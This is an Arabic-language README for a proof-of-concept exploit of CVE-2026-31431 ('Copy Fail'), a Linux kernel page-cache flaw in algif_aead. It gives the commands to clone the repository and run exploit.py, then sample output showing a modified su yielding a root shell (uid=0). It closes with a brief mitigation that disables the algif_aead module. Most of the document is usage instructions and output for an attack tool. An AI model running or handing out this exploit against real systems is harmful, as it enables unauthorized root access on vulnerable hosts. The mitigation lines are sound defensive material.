
CVE-2026-31431 - Linux Kernel ثغرة ذاكرة التخزين المؤقت للصفحات
يُقدم هذا المشروع حصريًا لـ:
المؤلف والمساهمون ليسوا مسؤولين عن سوء الاستخدام أو الأضرار أو فقدان البيانات أو انقطاع الخدمة أو أي أنشطة غير قانونية تتم باستخدام هذا البرنامج.
أداة بحث وإثبات مفهوم لـ CVE-2026-31431، المعروفة أيضًا باسم "Copy Fail"، وهي ثغرة في نواة لينكس تؤثر على تطبيق AEAD algif_aead / authencesn.
قد تسمح الثغرة بفساد ذاكرة التخزين المؤقت للصفحات تحت ظروف معينة، مما قد يؤدي إلى رفع الامتيازات المحلية على الأنظمة المعرضة للخطر.
استنساخ المستودع:
git clone https://github.com/Lutfifakee-Project/CVE-2026-31431.git
cd CVE-2026-31431
python3 exploit.py
python3 exploit.py --exploit
عند الطلب:
Type 'YES' to continue
python3 exploit.py --cleanup
python3 exploit.py --help
$ python3 exploit.py --exploit
[!] DANGER ZONE: Exploit mode
Type 'YES' to continue: YES
[*] CVE-2026-31431 Copy Fail Exploit
[+] Page cache patching complete!
[+] Executing modified su...
# id
uid=0(root) gid=1001(user)
إذا كنت مسؤول نظام وتحتاج إلى تخفيف المخاطر:
echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
sudo rmmod algif_aead 2>/dev/null